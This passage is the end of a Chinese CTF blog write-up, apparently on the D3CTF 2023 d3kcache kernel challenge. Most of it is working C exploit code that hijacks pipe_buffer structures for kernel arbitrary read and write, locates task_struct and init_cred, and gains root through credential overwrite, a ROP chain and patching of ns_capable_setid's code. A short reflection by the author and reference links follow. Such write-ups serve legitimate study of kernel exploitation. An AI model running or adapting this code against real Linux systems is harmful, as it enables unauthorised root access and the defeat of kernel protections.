"\033[32m\033[1m, orig: \033[0m%d\n",
snd_vicitm_pid, snd_orig_pid);
break;
}
}

if (snd_vicitm_pid == -1)
{
errExit("FAILED to corrupt second-level pipe_buffer!");
}
}

{
size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf, 0, sizeof(buf));

write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));

puts("[*] free second-level original pipe...");
close(pipe_fd[snd_orig_pid][0]);
close(pipe_fd[snd_orig_pid][1]);

puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid)
{
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0)
{
printf("[x] failed to resize %d pipe!\n", i);
errExit("FAILED to re-alloc pipe_buffer!");
}
}

puts("[*] hijacking the 2nd pipe_buffer on page to itself...");
evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid)
{
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page)
{
self_2nd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n",
self_2nd_pipe_pid);
break;
}
}

if (self_2nd_pipe_pid == -1)
{
errExit("FAILED to build a self-writing pipe!");
}

puts("[*] hijacking the 3rd pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid || i == self_2nd_pipe_pid)
{
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page)
{
self_3rd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_pid);
break;
}
}

if (self_3rd_pipe_pid == -1)
{
errExit("FAILED to build a self-writing pipe!");
}

puts("[*] hijacking the 4th pipe_buffer on page to itself...");
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid || i == self_2nd_pipe_pid || i == self_3rd_pipe_pid)
{
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page)
{
self_4th_pipe_pid = i;
printf("\033[32m\033[1m[+] Found another self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_pid);
break;
}
}

if (self_4th_pipe_pid == -1)
{
errExit("FAILED to build a self-writing pipe!");
}
}

{
puts("[*] Setting up kernel arbitrary read & write...");

memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;
}

{
vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
for (;;)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);

if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x070))
{
kernel_base = *(uint64_t *)buf - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);
}

uint64_t parent_task, current_task;

{
puts("[*] Seeking task_struct in memory...");

uint64_t *comm_addr = 0;
uint64_t *point_buf = malloc(0x1000);

for (int i = 0; 1; i++)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

comm_addr = memmem(point_buf, 0xf00, target, 0xf);
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) && (comm_addr[-3] > 0xffff888000000000) && (comm_addr[-57] > 0xffff888000000000) && (comm_addr[-56] > 0xffff888000000000))
{
parent_task = comm_addr[-57];

current_task = comm_addr[-50] - 2528;

page_offset_base = (comm_addr[-50] & 0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page *)(vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m"
"0x%lx\n\n",
current_task);
break;
}
}
}

int command = 0;
uint64_t stack_addr;
size_t *tsk_buf;
size_t *mm_struct_buf;
uint64_t mm_struct_addr;
uint64_t mm_struct_page;
uint64_t pgd_addr;

switch (command)
{
case 0:
puts("[*] Seeking for init_task...");
{
uint64_t init_task;
uint64_t init_cred;
uint64_t init_nsproxy;

for (;;)
{
size_t ptask_page_addr = direct_map_addr_to_page_addr(parent_task);

tsk_buf = (size_t *)((size_t)buf + (parent_task & 0xfff));

arbitrary_read_by_pipe((struct page *)ptask_page_addr, buf);
arbitrary_read_by_pipe((struct page *)(ptask_page_addr + 0x40), &buf[512 * 8]);

/* task_struct::real_parent */
if (parent_task == tsk_buf[309])
{
break;
}

parent_task = tsk_buf[309];
}

init_task = parent_task;
init_cred = tsk_buf[363];
init_nsproxy = tsk_buf[377];

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

/* now, changing the current task_struct to get the full root :) */
puts("[*] Escalating ROOT privilege now...");

size_t current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),
&buf[512 * 8], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_shell();
}
break;
case 1:
puts("[*] Reading current task_struct...");
{
size_t current_task_page = direct_map_addr_to_page_addr(current_task);
arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
stack_addr = tsk_buf[4];
mm_struct_addr = tsk_buf[292];

printf("\033[34m\033[1m[*] kernel stack's addr:\033[0m0x%lx\n", stack_addr);
printf("\033[34m\033[1m[*] mm_struct's addr:\033[0m0x%lx\n", mm_struct_addr);

mm_struct_page = direct_map_addr_to_page_addr(mm_struct_addr);

printf("\033[34m\033[1m[*] mm_struct's page:\033[0m0x%lx\n", mm_struct_page);

arbitrary_read_by_pipe((struct page *)mm_struct_page, buf);
arbitrary_read_by_pipe((struct page *)(mm_struct_page + 0x40), &buf[512 * 8]);

mm_struct_buf = (size_t *)((size_t)buf + (mm_struct_addr & 0xfff));

pgd_addr = mm_struct_buf[9];

printf("\033[32m\033[1m[+] Got kernel page table of current task:\033[0m"
"0x%lx\n\n",
pgd_addr);
}
{
puts("[*] Reading page table...");

size_t rop[0x1000];
size_t idx = 0;
uint64_t stack_addr_another;
size_t pud_addr, pmd_addr, pte_addr, pte_val;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (*(size_t *)((size_t *)buf + PMD_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf);
pte_val = (*(size_t *)((size_t *)buf + PTE_ENTRY(stack_addr)) & (~0xfff)) & (~PAGE_ATTR_NX);

stack_addr_another = pte_val;
stack_addr_another &= (~PAGE_ATTR_NX);
stack_addr_another += page_offset_base;

printf("\033[32m\033[1m[+] Got another virt addr of kernel stack: \033[0m"
"0x%lx\n\n",
stack_addr_another);

for (int i = 0; i < ((0x1000 - 0x100) / 8); i++)
{
rop[idx++] = RET + kernel_offset;
}

rop[idx++] = POP_RDI_RET + kernel_offset;
rop[idx++] = INIT_CRED + kernel_offset;
rop[idx++] = COMMIT_CREDS + kernel_offset;
rop[idx++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 54 + kernel_offset;
rop[idx++] = *(size_t *)"0x196082";
rop[idx++] = *(size_t *)"0x196082";
rop[idx++] = (size_t)get_shell;
rop[idx++] = user_cs;
rop[idx++] = user_rflags;
rop[idx++] = user_sp;
rop[idx++] = user_ss;

uint64_t stack_page = direct_map_addr_to_page_addr(stack_addr_another);

puts("[*] Hijacking current task's stack...");

sleep(5);

arbitrary_write_by_pipe((struct page *)(stack_page + 0x40 * 3), rop, 0xff0);
}
case 2:
puts("[*] Reading current task_struct...");
{
size_t current_task_page = direct_map_addr_to_page_addr(current_task);
arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
stack_addr = tsk_buf[4];
mm_struct_addr = tsk_buf[292];

printf("\033[34m\033[1m[*] kernel stack's addr:\033[0m0x%lx\n", stack_addr);
printf("\033[34m\033[1m[*] mm_struct's addr:\033[0m0x%lx\n", mm_struct_addr);

mm_struct_page = direct_map_addr_to_page_addr(mm_struct_addr);

printf("\033[34m\033[1m[*] mm_struct's page:\033[0m0x%lx\n", mm_struct_page);

arbitrary_read_by_pipe((struct page *)mm_struct_page, buf);
arbitrary_read_by_pipe((struct page *)(mm_struct_page + 0x40), &buf[512 * 8]);

mm_struct_buf = (size_t *)((size_t)buf + (mm_struct_addr & 0xfff));

pgd_addr = mm_struct_buf[9];

printf("\033[32m\033[1m[+] Got kernel page table of current task:\033[0m"
"0x%lx\n\n",
pgd_addr);
}
{
char *kcode_map;
size_t dst_paddr, dst_vaddr;

kcode_map = mmap((void *)0x114514000, 0x2000, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (!kcode_map)
{
errExit("FAILED to create mmap area!");
}

for (int i = 0; i < 8; i++)
{
kcode_map[i] = "0x196082"[i];
kcode_map[i + 0x1000] = "0x196082"[i];
}

dst_vaddr = NS_CAPABLE_SETID + kernel_offset;
printf("\033[34m\033[1m[*] vaddr of ns_capable_setid is: \033[0m0x%lx\n", dst_vaddr);

size_t pud_addr, pmd_addr;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(dst_vaddr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(dst_vaddr)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
dst_paddr = (*(size_t *)((size_t *)buf + PMD_ENTRY(dst_vaddr)) & (~0xfff)) & (~PAGE_ATTR_NX);

dst_paddr += 0x1000 * PTE_ENTRY(dst_vaddr);

printf("\033[32m\033[1m[+] Got ns_capable_setid's phys addr: \033[0m"
"0x%lx\n\n",
dst_paddr);

size_t pte_addr;
{
arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(0x114514000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(0x114514000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (*(size_t *)((size_t *)buf + PMD_ENTRY(0x114514000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf);
*(size_t *)((size_t *)buf + PTE_ENTRY(0x114514000)) = dst_paddr | 0x8000000000000867;
arbitrary_write_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf, 0xff0);
}

{
arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pgd_addr), buf);
pud_addr = (*(size_t *)((size_t *)buf + PGD_ENTRY(0x114514000 + 0x1000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pud_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pud_addr), buf);
pmd_addr = (*(size_t *)((size_t *)buf + PUD_ENTRY(0x114514000 + 0x1000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pmd_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pmd_addr), buf);
pte_addr = (*(size_t *)((size_t *)buf + PMD_ENTRY(0x114514000 + 0x1000)) & (~0xfff)) & (~PAGE_ATTR_NX);
pte_addr += page_offset_base;

arbitrary_read_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf);
*(size_t *)((size_t *)buf + PTE_ENTRY(0x114514000 + 0x1000)) = (dst_paddr + 0x1000) | 0x8000000000000867;
arbitrary_write_by_pipe((void *)direct_map_addr_to_page_addr(pte_addr), buf, 0xff0);
}

puts("[*] Start overwriting kernel code segment...");

/**
* The setresuid() check for user's permission by ns_capable_setid(),
* so we can just patch it to let it always return true :)
*/
memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40);
memcpy(kcode_map + (NS_CAPABLE_SETID & 0xfff) + 0x40,
"\xf3\x0f\x1e\xfa"
"H\xc7\xc0\x01\x00\x00\x00"
"\xc3",
12);

puts("[*] trigger evil ns_capable_setid() in setresuid()...\n");

sleep(5);

setresuid(0, 0, 0);
get_shell();
}
}

return 0;
}

image-20230524153518128image-20230524160032198image-20230524162232568

本人当时做的笨办法

因为当时注意到存在off by null漏洞,第一反应就是利用msg_msg结构体来做这道题。属于是瞎猫碰到死耗子,我在没有考虑页级堆风水的情况下申请的msg_msgorder正好为3,也导致有一定的几率能够达到UAF的效果。自然,我的第一反应也是修改cred结构体,虽然能够成功找到但是成功率十分的低,每次调试需要手动跑二十多分钟,因为内存中有一大块存放着各种指针,导致无法继续往下搜索出现kernel panic,并且在改回普通用户权限后出现了这篇文章开头部分提到的io_uring的问题,所以也就放弃了这一方法。

然而,因为当时不清楚CFI的作用又跑去改ops去了,调了半天发现永远会在最后一步造成panic,并且也没有找到可以用来实现栈迁移的gadget,所以这个方法也被放弃了。刚刚结束比赛看了NULL的wp之后就觉得自己是真的太蠢了,分明可以直接修改pipe_buffer了居然没有想到Dirty Pipe,虽然墨晚鸢佬说这不是最优解,但是是我唯一能够做出来的方法我居然没想到,我是真的蠢!!!


参考链接:

https://arttnba3.cn/2023/05/02/CTF-0X08_D3CTF2023_D3KCACHE/#Final-Exploitation

https://elixir.bootlin.com/linux/v6.2.12/source

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量